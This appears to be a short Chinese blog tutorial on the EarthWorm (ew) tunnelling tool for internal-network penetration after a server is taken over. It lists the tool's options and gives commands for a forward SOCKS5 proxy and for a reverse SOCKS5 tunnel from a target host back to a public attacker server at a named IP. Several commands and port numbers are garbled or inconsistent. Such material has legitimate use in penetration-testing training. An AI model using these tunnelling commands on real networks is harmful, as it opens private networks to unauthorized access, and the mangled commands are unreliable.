ew端口转发

小数志

共 1645字,需浏览 4分钟

 ·

2020-10-23 23:53

前言


当我们在内网渗透中,并拿下了内网一台服务器权限时,自以为内网渗透已经算一次完整渗透了?


.....其实并不是。内网漫游的渗透是不完整的


本文使用的是一款内网穿透神器:EarthWorm




0x01 ew介绍



这里EarthWorm简称EW﴿是一套轻量便携且功能强大的网络穿透工具,基于标准C开发,具有sAocks5代理、端口转发和端口映射三大功能


不会用咋办?:妈的看官方文档


下载地址:https://github.com/idlefire/ew



1.可穿透复杂的内网环境。(这么说吧:我本地连着路由器开一个虚拟机,可以直接反弹到公网的

云服务器上。)



2.以支持多平台间的转接通讯,LinuxWindowsMacOSArm‐Linux均支持。

支持平台列表:(可跨平台反弹)


ew_for_Win.exe   适用各种Windows系统(X86指令集、X64指令集)   Windows7Windows  XPew_for_Linux32   各常见Linux发行版(X86指令集  CPU)         Ubuntu(X86)/BT5(X86)ew_for_linux64    各常见Linux发行版(X64指令集  CPU)        Ubuntu(X64)/kali(X64)ew_for_MacOSX64    MacOS系统发行版  (X64指令集)            苹果PC电脑,苹果serverew_for_Arm32      常见Arm-Linux系统                         HTC  New  One(Arm-Android)/小米路由器(R1Dew_mipsel         常见Mips-Linux系统  (Mipipsel指令集 CPU) 萤石硬盘录像机、小米mini路由器(R1CM


帮助文档:

nsocks类似通过Socks5代理后的netcat,可用来测试socks    serverssocksd用来开启Socks5代理服务ssocks本地启用Socks5服务,并反弹到另一IP地址rcsocks接收反弹过来的Socks5服务,并转向另一端口‐l  listenport为服务启动打开一个端口。‐d  refhost设置反射主机地址。‐e  refport设置反射端口。‐f  connhost设置连接主机地址。‐g  connport设置连接端口。‐h通过添加‐s参数来显示帮助文本,您还可以看到更详细的帮助。‐a关于显示“关于”页面‐v版本显示版本。


0x02  使用方法


该工具共有 6 种命令格式,帮助文档写了常用的3种(ssocksdrcsocksrssockslcx_slavelcx_listenlcx_tran



1、开启正向SOCKS v5服务器


ew_for_Win.exes  ssocksdl 1080




2、反弹 SOCKS v5  服务器


操作具体分两步:

 

a﴿先在一台具有公网 ip 的主机A上运行以下命令假设这里公网ip为:


47.104.70.161﴿

ew_for_Win.exes  rcsocksl 1080  ‐e  9999


 

b﴿在目标主机B上启动 SOCKS v5 服务 并反弹到公网主机的 8888端口


ew_for_Win.exes  rssocksd 47.104.70.161e  9999



攻击机器会弹 成功



此时一个Socks5连接工具就可以连接到本地1008端口来代理访问了,这里我使用Proxifier进行代理



在代理处配置127.0.0.1:1080,测试代理已连接。




浏览 43
点赞
评论
收藏
分享

手机扫一扫分享

举报
评论
图片
表情
推荐
点赞
评论
收藏
分享

手机扫一扫分享

举报